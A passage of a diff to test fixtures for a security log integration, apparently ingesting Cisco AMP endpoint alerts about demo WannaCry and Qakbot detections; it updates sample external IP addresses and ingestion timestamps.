"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -139,7 +139,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -185,7 +185,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -202,8 +202,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965487365Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.388865700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -225,7 +225,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -275,7 +275,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -292,8 +292,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965489493Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:55.388870400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -315,7 +315,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -365,7 +365,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -382,8 +382,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965491566Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:55.388875300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -405,7 +405,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -446,7 +446,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -456,8 +456,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965493606Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.388881100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -477,7 +477,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -518,7 +518,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -528,8 +528,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965495672Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:55.388886800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -549,7 +549,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -594,7 +594,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -604,8 +604,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965497735Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:55.388892500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -625,7 +625,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -675,7 +675,7 @@ "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -692,8 +692,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965499836Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}", + "ingested": "2021-12-09T13:35:55.388898200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -715,7 +715,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -758,7 +758,7 @@ "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -772,8 +772,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965501904Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", + "ingested": "2021-12-09T13:35:55.388904Z", + "original": 
